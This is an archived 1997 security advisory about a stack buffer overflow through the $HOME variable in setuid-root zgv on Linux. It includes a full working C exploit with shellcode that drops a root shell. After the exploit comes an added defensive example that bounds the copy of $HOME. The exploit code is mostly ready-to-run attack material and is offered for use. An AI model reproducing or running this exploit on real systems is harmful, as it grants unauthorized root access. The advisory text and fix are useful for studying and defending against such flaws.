zgv $HOME overflow

Summary
Description: zgv, which is setuid root on many systems, takes untrusted environment data ($HOME) and copies it into an automatic character buffer without a length check, allowing a standard stack buffer overflow.
Author: ksrt <ksrt@DEC.NET> sent the advisory; BeastMaster V wrote the exploit code.
Compromise: root (local)
Vulnerable Systems: Linux; Red Hat 3.0.3 - 4.1 and anything else running zgv setuid root
Date: 19 June 1997
Notes: The exploit is appended to the advisory.
Details


Date: Thu, 19 Jun 1997 14:15:42 -0700
From: ksrt <ksrt@DEC.NET>
To: best-of-security@suburbia.net
Subject: BoS: svgalib/zgv


                                                          KSR[T] Advisory #001
                                                          Date:  June 09, 1997
                                                          ID #:  lin-svga-001

Operating System(s): Redhat Linux 3.0.3 - 4.1 / Any Linux with zgv setuid root.

Affected Program:    svgalib/zgv-2.7 ( an svgalib GIF/JPG viewer )

Problem Description: svgalib 1.2.10 and below do not properly revoke
                     privileges, and through the use of saved user ids,
                     any svgalib application may still be vulnerable to
                     buffer overruns (stack overwrites).

                     zgv will take data from an environment variable (HOME),
                     and copies the entire length of the environment variable
                     into an automatic character buffer.  The result is that
                     arbitrary code may be executed as root.  There are also
                     overflows on the command line and through stdin.

Compromise:          With zgv, the consequences are minimal, as only a user
                     who has access to the console can exploit this hole.
                     However, most svgalib applications are poorly written
                     from a security standpoint and the potential compromise
                     may be greater with other applications.

Patch/Fix:           svgalib-1.2.11 will address this security issue.  Look
                     for our upcoming paper on vulnerabilities in svgalib
                     that will explain proper programming methods and other
                     potential problems with svgalib applications.


---

Please note that this was not a full audit of zgv, and there may be other
security problems related to zgv.

-----
KSR[T] Website : http://www.dec.net/ksrt
E-mail: ksrt@dec.net

/*
 *
 * zgv exploit coded by BeastMaster V on June 20, 1997
 *
 * USAGE:
 *   For some strange reason, the filename length of this
 *   particular exploit must be one character long, otherwise you
 *   will be dropped into a normal unprivileged shell. Go Figure....
 *
 *   $ cp zgv_exploit.c n.c
 *   $ cc -o n n.c
 *   $ ./n
 *   Oak driver: Unknown chipset (id =  0)
 *   bash#
 *
 * EXPLANATION: zgv (suid root) does not check bounds for $HOME env.
 * TEMPORARY FIX:  chmod u-s /usr/bin/zgv
 * NOTE: Don't forget to visit http://www.rootshell.com for more exploits.
 * DISCLAIMER: Please use this in a responsible manner.
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";

/* Reads the current stack pointer; 32-bit x86 only.  The value is left in
 * %eax, the return register, so no explicit return statement is written. */
char *get_sp() {
   asm("movl %esp,%eax");
}

#define bufsize 4096
char buffer[bufsize];

int main(void) {
  int i;

  /* Fill the whole buffer with a guessed return address: the current
   * stack pointer minus a fixed offset, aimed at the sled below. */
  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() - 4675;

  /* NOP sled (0x90) at the front, followed by the shellcode. */
  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;   /* terminate so setenv() sees a C string */

  /* The oversized value reaches zgv through the unchecked $HOME variable. */
  setenv("HOME", buffer, 1);

  execl("/usr/bin/zgv", "/usr/bin/zgv", NULL);
  return 0;
}
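Added here as a defender's counterpart, not code from the advisory, from zgv or from the exploit author: the unbounded copy of $HOME that the advisory describes, beside a bounded replacement that refuses an over-long or relative HOME before anything is written to the stack. The `/.zgvrc` suffix, the function names and the buffer sizes are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed illustration, not zgv's code. The advisory describes the
 * shape  char path[N]; strcpy(path, getenv("HOME"));  run setuid root;
 * the config-file suffix "/.zgvrc" used below is an assumption. */
#define RC_SUFFIX "/.zgvrc"

/* Hardened form: build "$HOME/.zgvrc" into a caller-sized buffer.
 * Returns 0 on success, -1 if HOME is unset, not absolute, or would not
 * fit together with the suffix and terminating NUL (sizeof counts it). */
int build_rc_path(const char *home, char *dst, size_t dstlen)
{
    if (home == NULL || home[0] != '/')
        return -1;
    size_t hlen = strlen(home);
    if (hlen + sizeof RC_SUFFIX > dstlen)
        return -1;
    memcpy(dst, home, hlen);
    memcpy(dst + hlen, RC_SUFFIX, sizeof RC_SUFFIX);
    return 0;
}

/* Self-check: an ordinary HOME is accepted and the path is exact. */
int check_normal_home(void)
{
    char out[64];
    return build_rc_path("/home/alice", out, sizeof out) == 0
        && strcmp(out, "/home/alice/.zgvrc") == 0;
}

/* Self-check: a 4 KiB HOME, the size the exploit above sets, is refused
 * instead of running off the end of a small automatic array. */
int check_overlong_home(void)
{
    char big[4096], out[64];
    memset(big, 'A', sizeof big - 1);
    big[0] = '/'; big[sizeof big - 1] = '\0';
    return build_rc_path(big, out, sizeof out) == -1;
}

int main(void)
{
    /* Real setuid code calls setuid(getuid()) while still root first: it clears the saved uid too. */
    char path[256];
    if (build_rc_path(getenv("HOME"), path, sizeof path) == 0)
        printf("config path: %s\n", path);
    return check_normal_home() && check_overlong_home() ? 0 : 1;
}
```

The length check is the fix for the overflow itself; the setuid(getuid()) remark covers the second point in the advisory, that a program which keeps root in its saved uid is still exploitable even after an apparent privilege drop.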

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap.